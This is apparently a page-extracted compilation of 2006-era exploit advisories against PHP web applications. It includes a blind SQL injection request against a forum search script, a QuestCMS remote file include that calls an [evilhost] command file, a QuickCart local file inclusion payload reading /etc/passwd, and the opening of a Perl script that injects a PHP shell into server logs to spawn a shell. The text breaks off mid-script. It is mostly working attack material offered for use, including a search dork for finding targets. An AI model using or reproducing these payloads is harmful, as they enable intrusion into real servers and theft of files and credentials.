Consequently, if you perform a search request with only a keyword and no author f.e., an attacker is thus able to populate $keyword_results and then $search_ids indexes with any possi
Trang 1content Consequently, if you perform a search request with only
a keyword and no author f.e., an attacker is thus able to
populate $keyword_results and then $search_ids indexes with any
possible content coming from $result_list Finally, the
$search_ids array is imploded and put in the SQL query without
any protection In a word, there is an SQL injection here
3) Exploitation
With an adequate UNION query in the $result_list array, an
attacker is able to perform blind SQL injections and f.e
retrieve the entire hash of any user just by looking if the
script returned some results for his malicious search For
example, you can send the following request :
search.php?action=search&keywords=hello&author=&forum=-1
&search_in=all&sort_by=0&sort_dir=DESC&show_as=topics&search=1 &result_list[< UNION SQL QUERY >
sexyvirus(HCE)
QuestCMS (main.php) Remote File Include Vulnerability
Code:
!!!!!!!!!WWW.SÝBERSAVASCÝLAR.COM!!!!!!!!!
-
Title : Questcms Remote File Include Vulnerability
-
#Author: Crackers_Child
#cont@ct: crackers_child@sibersavascilar.com
-
Affected software description :
-
Application : Questwork Web Content Management system (QuestCMS)
Trang 2URL : http://www.questwork.com
-
dork : allinurl:"/questcms/"
Exploit :
-
Usage:
http://[target]/[questcms_path]/main/main.php?pi=http://[evilhost]/cmd.txt?&cmd=
ls
-
greets:
X_ALPREN_X,Root_Mor and My Other Friends
-
- [ WWW.SÝBERSAVASCÝLAR.COM ] -
# milw0rm.com [2006-08-07]
vns3curity(HCE)
QuickCart 2.0 (categories.php) Local File Inclusion Exploit
Code:
##################################################################
###############################
# r0ut3r Presents #
Trang 3# #
# Another r0ut3r discovery! #
# writ3r [at] gmail.com #
# #
# QuickCart 2.0 Local File Inclusion Exploit #
################################################################## ############################### # Software: QuickCart 2.0 #
# #
# Vendor: http://opensolution.org/ #
# #
# Released: 2006/12/03 #
# #
# Critical: Moderately crtical #
# #
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com)
# # #
# Note: The information provided in this document is for Quick Cart administrator
# # testing purposes only! #
# #
# register_globals must be on #
# gpc_magic_quotes must be off #
# #
# actions_admin/categories.php?config[db_type]= #
# actions_admin/couriers.php?config[db_type]= #
# actions_admin/orders.php?config[db_type]= #
# actions_admin/products.php?config[db_type]= #
# actions_client/products.php?config[db_type]= #
# actions_client/orders.php?config[db_type]= #
# #
# Vulnerable code: #
# require_once DIR_CORE.'couriers-'.$config['db_type'].'.php';
# # #
# Patch: (Place this code at the top of every file) #
# if(basename( FILE ) == basename($_SERVER['PHP_SELF']))
#
Trang 4# die(); #
# #
# Exploit: categories.php?config[db_type]= / / / / / / / / / / /etc/passwd%00
#
# Usage: perl localfilexpl.pl 127.0.0.1
actions_admin/categories.php?config[db_type]= #
##################################################################
###############################
##################################################################
##########
# Local File Inclusion Exploiter #
# #
# This script attempts to exploit a local file include vulnerability #
# by finding a readable http log file, then by sending a specially crafted #
# http request to the server in order to insert a PHP Shell into the #
# log files A shell is then spawned #
# #
# Created By r0ut3r (writ3r [at] gmail.com) #
##################################################################
##########
use IO::Socket;
use Switch;
$port = "80"; # connection port
$target = @ARGV[0]; # localhost
$vulnf = @ARGV[1]; # /include/WBmap.php?l=
$opt = @ARGV[2]; # -p (not needed)
sub Header()
{
print q {Local File Inclusion Exploiter - By r0ut3r (writ3r [at]
gmail.com)
-
};
}
sub Usage()
Trang 5{
print q {Usage: localfilexpl.pl [target] [folder & vulnerable file] [opt]
Example: localfilexpl.pl localhost /include/WBmap.php?l= -p
opt = -p (To print recieved content)
};
exit();
}
Header();
if (!$target || !$vulnf) {
Usage(); }
@targets = (
"var/log/httpd/access_log",
"var/log/httpd/error_log",
"var/log/access_log",
"var/log/error_log",
"var/www/logs/access.log",
"var/www/logs/access_log",
"var/www/logs/error_log",
"var/www/logs/error.log",
"apache/logs/access_log",
"apache/logs/error.log",
"etc/httpd/logs/access.log",
"etc/httpd/logs/access_log",
"etc/httpd/logs/error.log",
"etc/httpd/logs/error_log",
"usr/local/apache/logs/access.log",
"usr/local/apache/logs/access_log",
"usr/local/apache/logs/error.log",
"usr/local/apache/logs/error_log",
"var/log/apache2/error_log",
"var/log/apache2/error.log",
"var/log/apache2/access_log",
"var/log/apache2/access.log",
"access_log",
);